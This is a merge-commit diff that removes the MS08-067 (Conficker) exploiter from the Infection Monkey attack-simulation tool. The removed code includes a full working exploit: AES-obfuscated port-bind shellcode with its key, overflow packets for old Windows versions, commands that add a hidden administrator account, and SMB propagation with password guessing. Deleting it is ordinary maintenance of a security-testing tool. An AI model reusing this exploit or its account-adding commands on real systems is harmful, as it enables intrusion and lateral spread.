Merge pull request #1687 from guardicore/1677-remove-ms08-067
Remove MS08-067 Exploiter
635496a4be
@ -19,7 +19,7 @@ Changelog](https://keepachangelog.com/en/1.0.0/).
|
||||||
clearer instructions to the user and avoid confusion. #1684
|
clearer instructions to the user and avoid confusion. #1684
|
||||||
|
|
||||||
### Removed
|
### Removed
|
||||||
- The VSFTPD exploiter. #1533
|
- VSFTPD exploiter. #1533
|
||||||
- Manual agent run command for CMD. #1570
|
- Manual agent run command for CMD. #1570
|
||||||
- Sambacry exploiter. #1567
|
- Sambacry exploiter. #1567
|
||||||
- "Kill file" option in the config. #1536
|
- "Kill file" option in the config. #1536
|
||||||
|
@ -40,6 +40,7 @@ Changelog](https://keepachangelog.com/en/1.0.0/).
|
||||||
- "GET /api/monkey_control/check_remote_port/<string:port>" endpoint. #1635
|
- "GET /api/monkey_control/check_remote_port/<string:port>" endpoint. #1635
|
||||||
- Max victims to find/exploit, TCP scan interval and TCP scan get banner internal options. #1597
|
- Max victims to find/exploit, TCP scan interval and TCP scan get banner internal options. #1597
|
||||||
- MySQL fingerprinter. #1648
|
- MySQL fingerprinter. #1648
|
||||||
|
- MS08-067 (Conficker) exploiter. #1677
|
||||||
|
|
||||||
### Fixed
|
### Fixed
|
||||||
- A bug in network map page that caused delay of telemetry log loading. #1545
|
- A bug in network map page that caused delay of telemetry log loading. #1545
|
||||||
|
|
|
@ -47,7 +47,6 @@ The Infection Monkey uses the following techniques and exploits to propagate to
|
||||||
* SMB
|
* SMB
|
||||||
* WMI
|
* WMI
|
||||||
* Shellshock
|
* Shellshock
|
||||||
* Conficker
|
|
||||||
* Elastic Search (CVE-2015-1427)
|
* Elastic Search (CVE-2015-1427)
|
||||||
* Weblogic server
|
* Weblogic server
|
||||||
* and more, see our [Documentation hub](https://www.guardicore.com/infectionmonkey/docs/reference/exploiters/) for more information about our RCE exploiters.
|
* and more, see our [Documentation hub](https://www.guardicore.com/infectionmonkey/docs/reference/exploiters/) for more information about our RCE exploiters.
|
||||||
|
|
|
@ -1,14 +0,0 @@
|
||||||
---
|
|
||||||
title: "MS08 067"
|
|
||||||
date: 2020-07-14T08:42:54+03:00
|
|
||||||
draft: false
|
|
||||||
tags: ["exploit", "windows"]
|
|
||||||
---
|
|
||||||
|
|
||||||
### Description
|
|
||||||
|
|
||||||
[MS08-067](https://docs.microsoft.com/en-us/security-updates/securitybulletins/2008/ms08-067) is a remote code execution vulnerability.
|
|
||||||
|
|
||||||
This exploiter is unsafe. It's therefore **not** enabled by default.
|
|
||||||
|
|
||||||
If an exploit attempt fails, this could also lead to a crash in Svchost.exe. If a crash in Svchost.exe occurs, the server service will be affected. This may cause a system crash due to the use of buffer overflow.
|
|
|
@ -1,30 +0,0 @@
|
||||||
# This code is used to obfuscate shellcode
|
|
||||||
# Usage:
|
|
||||||
# shellcode_obfuscator.py [your normal shellcode].
|
|
||||||
|
|
||||||
import sys
|
|
||||||
|
|
||||||
# PyCrypto is deprecated, but we use pycryptodome, which uses the exact same imports
|
|
||||||
from Crypto.Cipher import AES # noqa: DUO133 # nosec: B413
|
|
||||||
|
|
||||||
# We only encrypt payloads to hide them from static analysis
|
|
||||||
# it's OK to have these keys plaintext
|
|
||||||
KEY = b"1234567890123456"
|
|
||||||
NONCE = b"\x93n2\xbc\xf5\x8d:\xc2fP\xabn\x02\xb3\x17f"
|
|
||||||
|
|
||||||
|
|
||||||
# Use this manually to get obfuscated bytes of shellcode
|
|
||||||
def obfuscate(shellcode: bytes) -> bytes:
|
|
||||||
cipher = AES.new(KEY, AES.MODE_EAX, nonce=NONCE)
|
|
||||||
ciphertext, _ = cipher.encrypt_and_digest(shellcode)
|
|
||||||
return ciphertext
|
|
||||||
|
|
||||||
|
|
||||||
def clarify(shellcode: bytes) -> bytes:
|
|
||||||
cipher = AES.new(KEY, AES.MODE_EAX, nonce=NONCE)
|
|
||||||
plaintext = cipher.decrypt(shellcode)
|
|
||||||
return plaintext
|
|
||||||
|
|
||||||
|
|
||||||
if __name__ == "__main__":
|
|
||||||
print(obfuscate(sys.argv[1].encode()))
|
|
|
@ -23,7 +23,6 @@ ScoutSuite = {git = "git://github.com/guardicode/ScoutSuite"}
|
||||||
pyopenssl = "==19.0.0" # We can't build 32bit ubuntu12 binary with newer versions of pyopenssl
|
pyopenssl = "==19.0.0" # We can't build 32bit ubuntu12 binary with newer versions of pyopenssl
|
||||||
pypsrp = "*"
|
pypsrp = "*"
|
||||||
typing-extensions = "*" # Allows us to use 3.9 typing features on 3.7 project
|
typing-extensions = "*" # Allows us to use 3.9 typing features on 3.7 project
|
||||||
pycryptodome = "*" # Used in common/utils/shellcode_obfuscator.py
|
|
||||||
altgraph = "*" # Required for pyinstaller branch, without it agents fail to build
|
altgraph = "*" # Required for pyinstaller branch, without it agents fail to build
|
||||||
pysmb = "*"
|
pysmb = "*"
|
||||||
"WinSys-3.x" = "*"
|
"WinSys-3.x" = "*"
|
||||||
|
|
|
@ -146,9 +146,6 @@ class Configuration(object):
|
||||||
|
|
||||||
skip_exploit_if_file_exist = False
|
skip_exploit_if_file_exist = False
|
||||||
|
|
||||||
ms08_067_exploit_attempts = 5
|
|
||||||
user_to_add = "Monkey_IUSER_SUPPORT"
|
|
||||||
|
|
||||||
###########################
|
###########################
|
||||||
# ransomware config
|
# ransomware config
|
||||||
###########################
|
###########################
|
||||||
|
|
|
@ -43,8 +43,6 @@
|
||||||
],
|
],
|
||||||
"monkey_log_path_windows": "%temp%\\~df1563.tmp",
|
"monkey_log_path_windows": "%temp%\\~df1563.tmp",
|
||||||
"monkey_log_path_linux": "/tmp/user-1563",
|
"monkey_log_path_linux": "/tmp/user-1563",
|
||||||
"ms08_067_exploit_attempts": 5,
|
|
||||||
"user_to_add": "Monkey_IUSER_SUPPORT",
|
|
||||||
"ping_scan_timeout": 10000,
|
"ping_scan_timeout": 10000,
|
||||||
"smb_download_timeout": 300,
|
"smb_download_timeout": 300,
|
||||||
"smb_service_name": "InfectionMonkey",
|
"smb_service_name": "InfectionMonkey",
|
||||||
|
|
|
@ -1,320 +0,0 @@
|
||||||
#!/usr/bin/env python
|
|
||||||
#############################################################################
|
|
||||||
# MS08-067 Exploit by Debasis Mohanty (aka Tr0y/nopsled)
|
|
||||||
# www.hackingspirits.com
|
|
||||||
# www.coffeeandsecurity.com
|
|
||||||
# Email: d3basis.m0hanty @ gmail.com
|
|
||||||
#############################################################################
|
|
||||||
|
|
||||||
import socket
|
|
||||||
import time
|
|
||||||
from enum import IntEnum
|
|
||||||
from logging import getLogger
|
|
||||||
|
|
||||||
from impacket import uuid
|
|
||||||
from impacket.dcerpc.v5 import transport
|
|
||||||
|
|
||||||
from common.utils.shellcode_obfuscator import clarify
|
|
||||||
from infection_monkey.exploit.HostExploiter import HostExploiter
|
|
||||||
from infection_monkey.exploit.tools.helpers import get_monkey_depth, get_target_monkey
|
|
||||||
from infection_monkey.exploit.tools.smb_tools import SmbTools
|
|
||||||
from infection_monkey.model import DROPPER_CMDLINE_WINDOWS, MONKEY_CMDLINE_WINDOWS
|
|
||||||
from infection_monkey.network.smbfinger import SMBFinger
|
|
||||||
from infection_monkey.network.tools import check_tcp_port
|
|
||||||
from infection_monkey.utils.commands import build_monkey_commandline
|
|
||||||
from infection_monkey.utils.random_password_generator import get_random_password
|
|
||||||
|
|
||||||
logger = getLogger(__name__)
|
|
||||||
|
|
||||||
# Portbind shellcode from metasploit; Binds port to TCP port 4444
|
|
||||||
OBFUSCATED_SHELLCODE = (
|
|
||||||
b"4\xf6kPF\xc5\x9b<K\xf8Q\t\xff\xc94\xa9('\xa5%4m\xcd\xa0c\xd9"
|
|
||||||
b"\xd4Y\xca\x80*\xa7S\x98\xb3n+k\xe5\xe3\xffR\x85\xf4k\xb2\xd3"
|
|
||||||
b"\xaa\x10*\x0f\xb5\xdc-W(\x9c\xfe\xfa\xb8\x0eT1\xce\x8a\x9b\x0c"
|
|
||||||
b'\xd4"v\x04\xac~\xec\x04\xb07v\x81\xfd\xed\xd6\x11\x82\xbaN\x1f+'
|
|
||||||
b"\xd6\x9a\xda\xb5yyP\xf2\r\x8ev\x87\xed\x1eU\xa8\xcd\xc3\xba\x9c"
|
|
||||||
b"\x02\xf5\x7f\xb1\xed\xfaN(|\xf7\x1aBPw\xdf!\x86\xd2\x8a\xfe\x1b"
|
|
||||||
b"\x01\xc3\x9d\x802\xeeQ\x13\xff\xde\x95\xe0u\xa5\x19\xc8\xdd"
|
|
||||||
b"\xab[\x86\xdf\xf8\x84\xc6{\xe0W\x9b\xb0[\x05bA\xfc\xde\xa8B"
|
|
||||||
b"\x91b\xfey\x152q4\x15\xa7\x91)\xe8\x8b@\xe8\x8bC\xfc\xa6\x7f"
|
|
||||||
b"\xfc%!_\xef\xe8\x13\xc3\xb4NDA\x0e%\xee\xbdK]L\xa2\x83|\xb3"
|
|
||||||
b"\xa2\xd3\x97]\xd8b\x03\xa7\x0c}\x93\x85\x18\x16\xff\xf1\xfe"
|
|
||||||
b"\xff\xe0E\x0b\xb6\xdb\xdc\xe5\xdb\xc5zr\xf1\r3\xd0\xf5\x80"
|
|
||||||
b"\x89\x86V\x97\x1a\xf2f\x95\x89\xd5\xce\x9a\xee\xa1\xcf\x97"
|
|
||||||
b"\x92\xc5Bx{7\x0cv\xa6\x9d\xaaf\xa4\xb4\x1e\x9ex\x1f\x91N\xe7ZY"
|
|
||||||
b"\xa90\xcd\x94\xb7\x800'\r\x19W\x86\x9d~\x87\x9a\x8e\x8c\x90Gq"
|
|
||||||
b"\x84sB\x07\x10\x8etP\xa5\xfe\x89\x1b\xfe\x0f\xa9&\xab\x19\x1fh"
|
|
||||||
b"\x18b\xd2y\xbd\xd1\xefe\x14p\xe5{ZW\x00T\xf8\x89\x8d\r\xd48\xb1V"
|
|
||||||
b"\xd9\xc3%\x89\x9c\x8e\x11\x00\x96\xe3\xd8\x80\\\x07\xc8d\x7f:\xc3T"
|
|
||||||
b"\xb8\xd1s#\xc0\x04\xcdL\xab\x87\xf0ff\xc2\x02\xe8j\x91\x0eF\x9c[\xb79"
|
|
||||||
b"\x13J\xcdf\xbd\x83\x84\xe2\x08\xe5\xcf\xb6\xda\xda\x07\xaa$\xfe($"
|
|
||||||
b"\x86\x0bO\xcb\x8fj\xf6\x15\xb9B\x82\x0c\x7f\xf5!\xad5j\xc7R\x1c"
|
|
||||||
b"\x95\xe7V^O\xdak\xa0q\x81\xf81\xe3lq{\x0f\xdb\ta\xe7>I,\xab\x1d"
|
|
||||||
b"\xa0\x92Y\x88\x1b$\xa0hK\x03\x0b\x0b\xcf\xe7\xff\x9f\x9d\xb6&J"
|
|
||||||
b"\xdf\x1b\xad\x1b5\xaf\x84\xed\x99\x01'\xa8\x03\x90\x01\xec\x13"
|
|
||||||
b"\xfb\xf9!\x11\x1dc\xd9*\xb4\xd8\x9c\xf1\xb8\xb9\xa1;\x93\xc1\x8dq"
|
|
||||||
b"\xe4\xe1\xe5?%\x1a\x96\x96\xb5\x94\x19\xb5o\x0c\xdb\x89Cq\x14M\xf8"
|
|
||||||
b"\x02\xfb\xe5\x88hL\xc4\xcdd\x90\x8bc\xff\xe3\xb8z#\x174\xbd\x00J"
|
|
||||||
b'\x1c\xc1\xccM\x94\x90tm\x89N"\xd4-'
|
|
||||||
)
|
|
||||||
|
|
||||||
SHELLCODE = clarify(OBFUSCATED_SHELLCODE).decode()
|
|
||||||
|
|
||||||
XP_PACKET = (
|
|
||||||
"\xde\xa4\x98\xc5\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x41\x00\x42\x00\x43"
|
|
||||||
"\x00\x44\x00\x45\x00\x46\x00\x47\x00\x00\x00\x36\x01\x00\x00\x00\x00\x00\x00\x36\x01"
|
|
||||||
"\x00\x00\x5c\x00\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47"
|
|
||||||
"\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48"
|
|
||||||
"\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49"
|
|
||||||
"\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a"
|
|
||||||
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x90"
|
|
||||||
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
|
|
||||||
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
|
|
||||||
"\x90\x90\x90\x90\x90\x90\x90" + SHELLCODE + "\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00"
|
|
||||||
"\x2e\x00\x5c\x00\x41\x00\x42\x00\x43\x00\x44\x00\x45\x00\x46\x00\x47\x00\x08\x04\x02"
|
|
||||||
"\x00\xc2\x17\x89\x6f\x41\x41\x41\x41\x07\xf8\x88\x6f\x41\x41\x41\x41\x41\x41\x41\x41"
|
|
||||||
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
|
||||||
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x90\x90\x90\x90\x90\x90\x90\x90"
|
|
||||||
"\xeb\x62\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x00\x00\xe8\x03\x00\x00\x02\x00\x00"
|
|
||||||
"\x00\x00\x00\x00\x00\x02\x00\x00\x00\x5c\x00\x00\x00\x01\x10\x00\x00\x00\x00\x00\x00"
|
|
||||||
)
|
|
||||||
|
|
||||||
# Payload for Windows 2000 target
|
|
||||||
PAYLOAD_2000 = "\x41\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00"
|
|
||||||
PAYLOAD_2000 += "\x41\x41\x41\x41\x41\x41\x41\x41"
|
|
||||||
PAYLOAD_2000 += "\x41\x41\x41\x41\x41\x41\x41\x41"
|
|
||||||
PAYLOAD_2000 += "\x41\x41"
|
|
||||||
PAYLOAD_2000 += "\x2f\x68\x18\x00\x8b\xc4\x66\x05\x94\x04\x8b\x00\xff\xe0"
|
|
||||||
PAYLOAD_2000 += "\x43\x43\x43\x43\x43\x43\x43\x43"
|
|
||||||
PAYLOAD_2000 += "\x43\x43\x43\x43\x43\x43\x43\x43"
|
|
||||||
PAYLOAD_2000 += "\x43\x43\x43\x43\x43\x43\x43\x43"
|
|
||||||
PAYLOAD_2000 += "\x43\x43\x43\x43\x43\x43\x43\x43"
|
|
||||||
PAYLOAD_2000 += "\x43\x43\x43\x43\x43\x43\x43\x43"
|
|
||||||
PAYLOAD_2000 += "\xeb\xcc"
|
|
||||||
PAYLOAD_2000 += "\x00\x00"
|
|
||||||
|
|
||||||
# Payload for Windows 2003[SP2] target
|
|
||||||
PAYLOAD_2003 = "\x41\x00\x5c\x00"
|
|
||||||
PAYLOAD_2003 += "\x2e\x00\x2e\x00\x5c\x00\x2e\x00"
|
|
||||||
PAYLOAD_2003 += "\x2e\x00\x5c\x00\x0a\x32\xbb\x77"
|
|
||||||
PAYLOAD_2003 += "\x8b\xc4\x66\x05\x60\x04\x8b\x00"
|
|
||||||
PAYLOAD_2003 += "\x50\xff\xd6\xff\xe0\x42\x84\xae"
|
|
||||||
PAYLOAD_2003 += "\xbb\x77\xff\xff\xff\xff\x01\x00"
|
|
||||||
PAYLOAD_2003 += "\x01\x00\x01\x00\x01\x00\x43\x43"
|
|
||||||
PAYLOAD_2003 += "\x43\x43\x37\x48\xbb\x77\xf5\xff"
|
|
||||||
PAYLOAD_2003 += "\xff\xff\xd1\x29\xbc\x77\xf4\x75"
|
|
||||||
PAYLOAD_2003 += "\xbd\x77\x44\x44\x44\x44\x9e\xf5"
|
|
||||||
PAYLOAD_2003 += "\xbb\x77\x54\x13\xbf\x77\x37\xc6"
|
|
||||||
PAYLOAD_2003 += "\xba\x77\xf9\x75\xbd\x77\x00\x00"
|
|
||||||
|
|
||||||
|
|
||||||
class WindowsVersion(IntEnum):
|
|
||||||
Windows2000 = 1
|
|
||||||
Windows2003_SP2 = 2
|
|
||||||
WindowsXP = 3
|
|
||||||
|
|
||||||
|
|
||||||
class SRVSVC_Exploit(object):
|
|
||||||
TELNET_PORT = 4444
|
|
||||||
|
|
||||||
def __init__(self, target_addr, os_version=WindowsVersion.Windows2003_SP2, port=445):
|
|
||||||
self._port = port
|
|
||||||
self._target = target_addr
|
|
||||||
self._payload = PAYLOAD_2000 if WindowsVersion.Windows2000 == os_version else PAYLOAD_2003
|
|
||||||
self.os_version = os_version
|
|
||||||
|
|
||||||
def get_telnet_port(self):
|
|
||||||
"""get_telnet_port()
|
|
||||||
|
|
||||||
The port on which the Telnet service will listen.
|
|
||||||
"""
|
|
||||||
|
|
||||||
return SRVSVC_Exploit.TELNET_PORT
|
|
||||||
|
|
||||||
def start(self):
|
|
||||||
"""start() -> socket
|
|
||||||
|
|
||||||
Exploit the target machine and return a socket connected to it's
|
|
||||||
listening Telnet service.
|
|
||||||
"""
|
|
||||||
|
|
||||||
target_rpc_name = "ncacn_np:%s[\\pipe\\browser]" % self._target
|
|
||||||
|
|
||||||
logger.debug("Initiating exploit connection (%s)", target_rpc_name)
|
|
||||||
self._trans = transport.DCERPCTransportFactory(target_rpc_name)
|
|
||||||
self._trans.connect()
|
|
||||||
|
|
||||||
logger.debug("Connected to %s", target_rpc_name)
|
|
||||||
|
|
||||||
self._dce = self._trans.DCERPC_class(self._trans)
|
|
||||||
self._dce.bind(uuid.uuidtup_to_bin(("4b324fc8-1670-01d3-1278-5a47bf6ee188", "3.0")))
|
|
||||||
|
|
||||||
dce_packet = self._build_dce_packet()
|
|
||||||
self._dce.call(0x1F, dce_packet) # 0x1f (or 31)- NetPathCanonicalize Operation
|
|
||||||
|
|
||||||
logger.debug("Exploit sent to %s successfully...", self._target)
|
|
||||||
logger.debug("Target machine should be listening over port %d now", self.get_telnet_port())
|
|
||||||
|
|
||||||
sock = socket.socket()
|
|
||||||
sock.connect((self._target, self.get_telnet_port()))
|
|
||||||
return sock
|
|
||||||
|
|
||||||
def _build_dce_packet(self):
|
|
||||||
if self.os_version == WindowsVersion.WindowsXP:
|
|
||||||
return XP_PACKET
|
|
||||||
# Constructing Malicious Packet
|
|
||||||
dce_packet = "\x01\x00\x00\x00"
|
|
||||||
dce_packet += "\xd6\x00\x00\x00\x00\x00\x00\x00\xd6\x00\x00\x00"
|
|
||||||
dce_packet += SHELLCODE
|
|
||||||
dce_packet += "\x41\x41\x41\x41\x41\x41\x41\x41"
|
|
||||||
dce_packet += "\x41\x41\x41\x41\x41\x41\x41\x41"
|
|
||||||
dce_packet += "\x41\x41\x41\x41\x41\x41\x41\x41"
|
|
||||||
dce_packet += "\x41\x41\x41\x41\x41\x41\x41\x41"
|
|
||||||
dce_packet += "\x41\x41\x41\x41\x41\x41\x41\x41"
|
|
||||||
dce_packet += "\x41\x41\x41\x41\x41\x41\x41\x41"
|
|
||||||
dce_packet += "\x41\x41\x41\x41\x41\x41\x41\x41"
|
|
||||||
dce_packet += "\x41\x41\x41\x41\x41\x41\x41\x41"
|
|
||||||
dce_packet += "\x00\x00\x00\x00"
|
|
||||||
dce_packet += "\x2f\x00\x00\x00\x00\x00\x00\x00\x2f\x00\x00\x00"
|
|
||||||
dce_packet += self._payload
|
|
||||||
dce_packet += "\x00\x00\x00\x00"
|
|
||||||
dce_packet += "\x02\x00\x00\x00\x02\x00\x00\x00"
|
|
||||||
dce_packet += "\x00\x00\x00\x00\x02\x00\x00\x00"
|
|
||||||
dce_packet += "\x5c\x00\x00\x00\x01\x00\x00\x00"
|
|
||||||
dce_packet += "\x01\x00\x00\x00"
|
|
||||||
|
|
||||||
return dce_packet
|
|
||||||
|
|
||||||
|
|
||||||
class Ms08_067_Exploiter(HostExploiter):
|
|
||||||
_TARGET_OS_TYPE = ["windows"]
|
|
||||||
_EXPLOITED_SERVICE = "Microsoft Server Service"
|
|
||||||
_windows_versions = {
|
|
||||||
"Windows Server 2003 3790 Service Pack 2": WindowsVersion.Windows2003_SP2,
|
|
||||||
"Windows Server 2003 R2 3790 Service Pack 2": WindowsVersion.Windows2003_SP2,
|
|
||||||
"Windows 5.1": WindowsVersion.WindowsXP,
|
|
||||||
}
|
|
||||||
|
|
||||||
def __init__(self, host):
|
|
||||||
super(Ms08_067_Exploiter, self).__init__(host)
|
|
||||||
|
|
||||||
def is_os_supported(self):
|
|
||||||
if self.host.os.get("type") in self._TARGET_OS_TYPE and self.host.os.get("version") in list(
|
|
||||||
self._windows_versions.keys()
|
|
||||||
):
|
|
||||||
return True
|
|
||||||
|
|
||||||
if not self.host.os.get("type") or (
|
|
||||||
self.host.os.get("type") in self._TARGET_OS_TYPE and not self.host.os.get("version")
|
|
||||||
):
|
|
||||||
is_smb_open, _ = check_tcp_port(self.host.ip_addr, 445)
|
|
||||||
if is_smb_open:
|
|
||||||
smb_finger = SMBFinger()
|
|
||||||
if smb_finger.get_host_fingerprint(self.host):
|
|
||||||
return self.host.os.get("type") in self._TARGET_OS_TYPE and self.host.os.get(
|
|
||||||
"version"
|
|
||||||
) in list(self._windows_versions.keys())
|
|
||||||
return False
|
|
||||||
|
|
||||||
def _exploit_host(self):
|
|
||||||
src_path = get_target_monkey(self.host)
|
|
||||||
|
|
||||||
if not src_path:
|
|
||||||
logger.info("Can't find suitable monkey executable for host %r", self.host)
|
|
||||||
return False
|
|
||||||
|
|
||||||
os_version = self._windows_versions.get(
|
|
||||||
self.host.os.get("version"), WindowsVersion.Windows2003_SP2
|
|
||||||
)
|
|
||||||
|
|
||||||
exploited = False
|
|
||||||
random_password = get_random_password()
|
|
||||||
for _ in range(self._config.ms08_067_exploit_attempts):
|
|
||||||
exploit = SRVSVC_Exploit(target_addr=self.host.ip_addr, os_version=os_version)
|
|
||||||
|
|
||||||
try:
|
|
||||||
sock = exploit.start()
|
|
||||||
|
|
||||||
sock.send(
|
|
||||||
"cmd /c (net user {} {} /add) &&"
|
|
||||||
" (net localgroup administrators {} /add)\r\n".format(
|
|
||||||
self._config.user_to_add,
|
|
||||||
random_password,
|
|
||||||
self._config.user_to_add,
|
|
||||||
).encode()
|
|
||||||
)
|
|
||||||
time.sleep(2)
|
|
||||||
sock.recv(1000)
|
|
||||||
|
|
||||||
logger.debug("Exploited into %r using MS08-067", self.host)
|
|
||||||
exploited = True
|
|
||||||
break
|
|
||||||
except Exception as exc:
|
|
||||||
logger.debug("Error exploiting victim %r: (%s)", self.host, exc)
|
|
||||||
continue
|
|
||||||
|
|
||||||
if not exploited:
|
|
||||||
logger.debug("Exploiter MS08-067 is giving up...")
|
|
||||||
return False
|
|
||||||
|
|
||||||
# copy the file remotely using SMB
|
|
||||||
remote_full_path = SmbTools.copy_file(
|
|
||||||
self.host,
|
|
||||||
src_path,
|
|
||||||
self._config.dropper_target_path_win_32,
|
|
||||||
self._config.user_to_add,
|
|
||||||
random_password,
|
|
||||||
)
|
|
||||||
|
|
||||||
if not remote_full_path:
|
|
||||||
# try other passwords for administrator
|
|
||||||
for password in self._config.exploit_password_list:
|
|
||||||
remote_full_path = SmbTools.copy_file(
|
|
||||||
self.host,
|
|
||||||
src_path,
|
|
||||||
self._config.dropper_target_path_win_32,
|
|
||||||
"Administrator",
|
|
||||||
password,
|
|
||||||
)
|
|
||||||
if remote_full_path:
|
|
||||||
break
|
|
||||||
|
|
||||||
if not remote_full_path:
|
|
||||||
return True
|
|
||||||
|
|
||||||
# execute the remote dropper in case the path isn't final
|
|
||||||
if remote_full_path.lower() != self._config.dropper_target_path_win_32.lower():
|
|
||||||
cmdline = DROPPER_CMDLINE_WINDOWS % {
|
|
||||||
"dropper_path": remote_full_path
|
|
||||||
} + build_monkey_commandline(
|
|
||||||
self.host,
|
|
||||||
get_monkey_depth() - 1,
|
|
||||||
self._config.dropper_target_path_win_32,
|
|
||||||
)
|
|
||||||
else:
|
|
||||||
cmdline = MONKEY_CMDLINE_WINDOWS % {
|
|
||||||
"monkey_path": remote_full_path
|
|
||||||
} + build_monkey_commandline(self.host, get_monkey_depth() - 1)
|
|
||||||
|
|
||||||
try:
|
|
||||||
sock.send(("start %s\r\n" % (cmdline,)).encode())
|
|
||||||
sock.send(("net user %s /delete\r\n" % (self._config.user_to_add,)).encode())
|
|
||||||
except Exception as exc:
|
|
||||||
logger.debug(
|
|
||||||
"Error in post-debug phase while exploiting victim %r: (%s)", self.host, exc
|
|
||||||
)
|
|
||||||
return True
|
|
||||||
finally:
|
|
||||||
try:
|
|
||||||
sock.close()
|
|
||||||
except socket.error:
|
|
||||||
pass
|
|
||||||
|
|
||||||
logger.info(
|
|
||||||
"Executed monkey '%s' on remote victim %r (cmdline=%r)",
|
|
||||||
remote_full_path,
|
|
||||||
self.host,
|
|
||||||
cmdline,
|
|
||||||
)
|
|
||||||
|
|
||||||
return True
|
|
|
@ -42,17 +42,6 @@ EXPLOITER_CLASSES = {
|
||||||
"link": "https://www.guardicore.com/infectionmonkey/docs/reference"
|
"link": "https://www.guardicore.com/infectionmonkey/docs/reference"
|
||||||
"/exploiters/mssql/",
|
"/exploiters/mssql/",
|
||||||
},
|
},
|
||||||
{
|
|
||||||
"type": "string",
|
|
||||||
"enum": ["Ms08_067_Exploiter"],
|
|
||||||
"title": "MS08-067 Exploiter",
|
|
||||||
"safe": False,
|
|
||||||
"info": "Unsafe exploiter, that might cause system crash due to the use of buffer "
|
|
||||||
"overflow. "
|
|
||||||
"Uses MS08-067 vulnerability.",
|
|
||||||
"link": "https://www.guardicore.com/infectionmonkey/docs/reference/exploiters/ms08"
|
|
||||||
"-067/",
|
|
||||||
},
|
|
||||||
{
|
{
|
||||||
"type": "string",
|
"type": "string",
|
||||||
"enum": ["SSHExploiter"],
|
"enum": ["SSHExploiter"],
|
||||||
|
|
|
@ -266,24 +266,6 @@ INTERNAL = {
|
||||||
}
|
}
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
"ms08_067": {
|
|
||||||
"title": "MS08_067",
|
|
||||||
"type": "object",
|
|
||||||
"properties": {
|
|
||||||
"ms08_067_exploit_attempts": {
|
|
||||||
"title": "MS08_067 exploit attempts",
|
|
||||||
"type": "integer",
|
|
||||||
"default": 5,
|
|
||||||
"description": "Number of attempts to exploit using MS08_067",
|
|
||||||
},
|
|
||||||
"user_to_add": {
|
|
||||||
"title": "Remote user",
|
|
||||||
"type": "string",
|
|
||||||
"default": "Monkey_IUSER_SUPPORT",
|
|
||||||
"description": "Username to add on successful exploit",
|
|
||||||
},
|
|
||||||
},
|
|
||||||
},
|
|
||||||
},
|
},
|
||||||
"smb_service": {
|
"smb_service": {
|
||||||
"title": "SMB service",
|
"title": "SMB service",
|
||||||
|
|
|
@ -34,7 +34,6 @@ class ExploiterDescriptorEnum(Enum):
|
||||||
ELASTIC = ExploiterDescriptor(
|
ELASTIC = ExploiterDescriptor(
|
||||||
"ElasticGroovyExploiter", "Elastic Groovy Exploiter", ExploitProcessor
|
"ElasticGroovyExploiter", "Elastic Groovy Exploiter", ExploitProcessor
|
||||||
)
|
)
|
||||||
MS08_067 = ExploiterDescriptor("Ms08_067_Exploiter", "Conficker Exploiter", ExploitProcessor)
|
|
||||||
SHELLSHOCK = ExploiterDescriptor(
|
SHELLSHOCK = ExploiterDescriptor(
|
||||||
"ShellShockExploiter", "ShellShock Exploiter", ShellShockExploitProcessor
|
"ShellShockExploiter", "ShellShock Exploiter", ShellShockExploitProcessor
|
||||||
)
|
)
|
||||||
|
|
|
@ -30,7 +30,6 @@ import {sshKeysReport, shhIssueReport, sshIssueOverview} from './security/issues
|
||||||
import {elasticIssueOverview, elasticIssueReport} from './security/issues/ElasticIssue';
|
import {elasticIssueOverview, elasticIssueReport} from './security/issues/ElasticIssue';
|
||||||
import {shellShockIssueOverview, shellShockIssueReport} from './security/issues/ShellShockIssue';
|
import {shellShockIssueOverview, shellShockIssueReport} from './security/issues/ShellShockIssue';
|
||||||
import {log4shellIssueOverview, log4shellIssueReport} from './security/issues/Log4ShellIssue';
|
import {log4shellIssueOverview, log4shellIssueReport} from './security/issues/Log4ShellIssue';
|
||||||
import {ms08_067IssueOverview, ms08_067IssueReport} from './security/issues/MS08_067Issue';
|
|
||||||
import {
|
import {
|
||||||
crossSegmentIssueOverview,
|
crossSegmentIssueOverview,
|
||||||
crossSegmentIssueReport,
|
crossSegmentIssueReport,
|
||||||
|
@ -136,11 +135,6 @@ class ReportPageComponent extends AuthComponent {
|
||||||
[this.issueContentTypes.REPORT]: powershellIssueReport,
|
[this.issueContentTypes.REPORT]: powershellIssueReport,
|
||||||
[this.issueContentTypes.TYPE]: this.issueTypes.DANGER
|
[this.issueContentTypes.TYPE]: this.issueTypes.DANGER
|
||||||
},
|
},
|
||||||
'Ms08_067_Exploiter': {
|
|
||||||
[this.issueContentTypes.OVERVIEW]: ms08_067IssueOverview,
|
|
||||||
[this.issueContentTypes.REPORT]: ms08_067IssueReport,
|
|
||||||
[this.issueContentTypes.TYPE]: this.issueTypes.DANGER
|
|
||||||
},
|
|
||||||
'ZerologonExploiter': {
|
'ZerologonExploiter': {
|
||||||
[this.issueContentTypes.OVERVIEW]: zerologonIssueOverview,
|
[this.issueContentTypes.OVERVIEW]: zerologonIssueOverview,
|
||||||
[this.issueContentTypes.REPORT]: zerologonIssueReport,
|
[this.issueContentTypes.REPORT]: zerologonIssueReport,
|
||||||
|
|
|
